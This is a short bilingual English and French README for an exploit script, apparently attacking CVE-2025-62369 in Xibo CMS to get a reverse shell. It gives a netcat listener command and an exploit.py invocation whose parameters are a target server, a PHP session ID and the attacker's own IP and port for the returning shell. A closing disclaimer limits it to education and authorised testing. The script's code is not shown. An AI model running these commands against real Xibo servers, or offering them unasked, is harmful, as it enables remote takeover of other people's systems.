
This script exploits CVE-2025-62369 in Xibo CMS to execute a reverse shell command.
Ce script exploite CVE-2025-62369 dans Xibo CMS pour exécuter une commande de reverse shell.
nc -lvnp <PORT>
python3 exploit.py -u "http://<TARGET_IP>:<TARGET_PORT>" -s "<PHPSESSID>" -i <LOCAL_IP> -p <PORT>
<TARGET_IP> : Adresse IP du serveur Xibo CMS<TARGET_PORT> : Port du serveur Xibo CMS<PHPSESSID> : Votre identifiant de session PHP<LOCAL_IP> : Votre IP pour recevoir le reverse shell<PORT> : Port pour le reverse shell (doit correspondre à votre écouteur)Avertissement :
Ce code est fourni à des fins éducatives et de tests autorisés uniquement.